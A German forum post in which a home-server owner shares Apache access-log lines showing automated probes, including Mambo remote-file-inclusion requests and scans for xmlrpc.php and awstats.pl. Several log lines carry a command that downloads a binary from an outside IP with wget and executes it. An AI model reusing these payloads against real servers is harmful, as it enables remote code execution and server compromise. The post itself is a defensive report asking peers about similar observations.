title image


Smiley Wer hat noch "Hacker-Angriffe" auf seinem Apache ?
Hallo zusammen,





die Überschrift ist wahrscheinlich ein wenig übertrieben, aber ich hoffe doch auf reges Feedback ;-)





Unten findet ihr einen Auszug aus dem Apache-Access-Log von meinem privaten Webserver zuhause, dieser dient eigentlich nur als Datei-Ablage, daher läuft nicht viel drauf.



Dass man im Internet tag-täglich diversen Scannern, Trojanern und Würmern ausgesetzt ist, ist mir durchaus klar. Das merkwürdige an dem Log-Auszug ist, dass gezielt bestimmte Dateien aufgerufen werden, oder es zumindest versucht wird. Vom Namen her ist es wohl möglich damit System-Code auszuführen. Der Aufruf der Dateien erfolgt nicht immer von der gleichen IP sondern von verschiedenen.

Mir scheint, also wurde die Logik eines herkömmlichen Port-Scanners verfeinert indem zugleich der Aufruf von Code geprüft wird ! Das ist mir in dieser Tiefe doch recht neu...

Ich will keine Panik stiften, die Requests wurden ja auch alle mit 404 bzw. 405 quittiert, aber bedenklich finde ich es schon.....



Habe natürlich gleich mal das Access Log auf meinem Provider-Apache geprüft da dort eine betroffene Anwendung läuft, aber dort ist nix...





Hat jemand von euch gleiche Beobachtungen gemacht ?





x.x.x.x - - [11/Feb/2006:00:39:01 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://

213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo| HTTP/1.1" 404 391

x.x.x.x - - [11/Feb/2006:00:39:02 +0100] "GET /cache/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://

213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo| HTTP/1.1" 404 391

x.x.x.x - - [11/Feb/2006:00:39:03 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLO

BALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo| HTTP/1.1"

404 385

x.x.x.x - - [11/Feb/2006:00:39:04 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOB

ALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo| HTTP/1.1"

404 384

x.x.x.x - - [16/Feb/2006:16:04:27 +0100] "POST /xmlrpc.php HTTP/1.1" 404 386

x.x.x.x - - [16/Feb/2006:16:04:29 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 391

x.x.x.x - - [16/Feb/2006:16:04:30 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 398

x.x.x.x - - [16/Feb/2006:16:04:31 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 399

x.x.x.x - - [16/Feb/2006:16:04:32 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 393

x.x.x.x - - [16/Feb/2006:16:04:33 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 399

x.x.x.x - - [16/Feb/2006:16:04:35 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 396

x.x.x.x - - [16/Feb/2006:16:04:36 +0100] "POST /xmlrpc.php HTTP/1.1" 404 386

x.x.x.x - - [16/Feb/2006:16:04:37 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 393

x.x.x.x - - [16/Feb/2006:16:04:38 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 393

x.x.x.x - - [17/Feb/2006:04:23:46 +0100] "GET // adm/awstats/awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:47 +0100] "GET // awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:47 +0100] "GET // cgi-local/ awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:49 +0100] "GET // cgi-local/awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:50 +0100] "GET // estadisticas/ awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:51 +0100] "GET // estadisticas/awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:54 +0100] "GET // estadisticas/cgi-bin/awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:54 +0100] "GET // usage/ awstats. pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:56 +0100] "GET // usage/awstats. pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:57 +0100] "GET // webstats/ awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:58 +0100] "GET // webstats/awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:58 +0100] "GET //.../awstats.pl HTTP/1.1" 404 389

x.x.x.x - - [17/Feb/2006:04:24:02 +0100] "GET //adm/ awstats/ awstats.pl HTTP/1.1" 404 379

x.x.x.x - - [17/Feb/2006:04:24:03 +0100] "GET //adm/ awstats/awstats.pl HTTP/1.1" 404 379

x.x.x.x - - [17/Feb/2006:04:24:04 +0100] "GET //adm/awstats/awstats.pl HTTP/1.1" 404 397

x.x.x.x - - [17/Feb/2006:04:24:05 +0100] "GET //admin/ awstats.pl HTTP/1.1" 404 381

x.x.x.x - - [17/Feb/2006:04:24:06 +0100] "GET //admin/awstats.pl HTTP/1.1" 404 391

x.x.x.x - - [17/Feb/2006:04:24:07 +0100] "GET //aws/awstats. pl HTTP/1.1" 404 387

x.x.x.x - - [17/Feb/2006:04:24:08 +0100] "GET //aws/awstats.pl HTTP/1.1" 404 389

x.x.x.x - - [17/Feb/2006:04:24:13 +0100] "GET //awstats-cgibin/awstats.pl HTTP/1.1" 404 400

x.x.x.x - - [17/Feb/2006:04:24:14 +0100] "GET //awstats.pl HTTP/1.1" 404 385

x.x.x.x - - [17/Feb/2006:04:24:14 +0100] "GET //awstats/ awstats.pl HTTP/1.1" 404 383

x.x.x.x - - [17/Feb/2006:04:24:19 +0100] "GET //awstats/awstats.pl HTTP/1.1" 404 393

x.x.x.x - - [17/Feb/2006:04:24:30 +0100] "GET //bin/awstats.pl HTTP/1.1" 404 389

x.x.x.x - - [17/Feb/2006:04:24:31 +0100] "GET //bin/awstats/ awstats.PL HTTP/1.1" 404 387

x.x.x.x - - [17/Feb/2006:04:24:33 +0100] "GET //bin/awstats/ awstats.pl HTTP/1.1" 404 387

x.x.x.x - - [17/Feb/2006:04:24:37 +0100] "GET //bin/awstats/awstats.PL HTTP/1.1" 404 397

x.x.x.x - - [17/Feb/2006:04:24:39 +0100] "GET //bin/awstats/awstats.pl HTTP/1.1" 404 397

x.x.x.x - - [17/Feb/2006:04:25:11 +0100] "GET //cgi-bin/stats/awstats.pl HTTP/1.1" 404 399

x.x.x.x - - [17/Feb/2006:04:25:12 +0100] "GET //cgi-bin2/ awstats/ awstats.pl HTTP/1.1" 404 384

x.x.x.x - - [17/Feb/2006:04:25:13 +0100] "GET //cgi-bin2/ awstats/awstats.pl HTTP/1.1" 404 384

x.x.x.x - - [17/Feb/2006:04:25:14 +0100] "GET //cgi-bin2/awstats/ awstats.pl HTTP/1.1" 404 392

x.x.x.x - - [17/Feb/2006:04:25:15 +0100] "GET //cgi-bin2/awstats/awstats.pl HTTP/1.1" 404 402

x.x.x.x - - [17/Feb/2006:04:25:16 +0100] "GET //cgi-local/ awstats.pl HTTP/1.1" 404 385

x.x.x.x - - [17/Feb/2006:04:25:17 +0100] "GET //cgi-local/awstats.pl HTTP/1.1" 404 395

x.x.x.x - - [17/Feb/2006:04:25:17 +0100] "GET //cgi/awstats.pl HTTP/1.1" 404 389

x.x.x.x - - [17/Feb/2006:04:25:18 +0100] "GET //cgi/stats/ awstats.pl HTTP/1.1" 404 385

x.x.x.x - - [17/Feb/2006:04:25:20 +0100] "GET //cgi/stats/awstats.pl HTTP/1.1" 404 395

x.x.x.x - - [17/Feb/2006:04:25:21 +0100] "GET //chi-bin/ awstats/ awstats.pl HTTP/1.1" 404 383

x.x.x.x - - [17/Feb/2006:04:25:22 +0100] "GET //chi-bin/ awstats/awstats.pl HTTP/1.1" 404 383

x.x.x.x - - [17/Feb/2006:04:25:22 +0100] "GET //chi-bin/awstats/ awstats.pl HTTP/1.1" 404 391

x.x.x.x - - [17/Feb/2006:04:25:23 +0100] "GET //chi-bin/awstats/awstats.pl HTTP/1.1" 404 401

x.x.x.x - - [17/Feb/2006:04:25:24 +0100] "GET //estadisticas/ awstats.pl HTTP/1.1" 404 388

x.x.x.x - - [17/Feb/2006:04:25:25 +0100] "GET //estadisticas/awstats.pl HTTP/1.1" 404 398

x.x.x.x - - [17/Feb/2006:04:25:25 +0100] "GET //estadisticas/cgi-bin/awstats.pl HTTP/1.1" 404 406

x.x.x.x - - [17/Feb/2006:04:25:26 +0100] "GET //s-cgi/awstats. pl HTTP/1.1" 404 389

x.x.x.x - - [17/Feb/2006:04:25:27 +0100] "GET //s-cgi/awstats.pl HTTP/1.1" 404 391

x.x.x.x - - [17/Feb/2006:04:25:29 +0100] "GET //scripts/ awstats.pl HTTP/1.1" 404 383

x.x.x.x - - [17/Feb/2006:04:25:29 +0100] "GET //scripts/awstats.pl HTTP/1.1" 404 393





Gruss Michael



Kennst du schon die Eier-legende-Woll-Milch-Sau ?


Eigeniniative ist der erste Schritt zur Selbstständigkeit - Besser ein Tip in die richtige Richtung als eine komplette Lösung !



geschrieben von

Login

E-Mail:
  

Passwort:
  

Beitrag anfügen

Symbol:
 
 
 
 
 
 
 
 
 
 
 
 
 

Überschrift: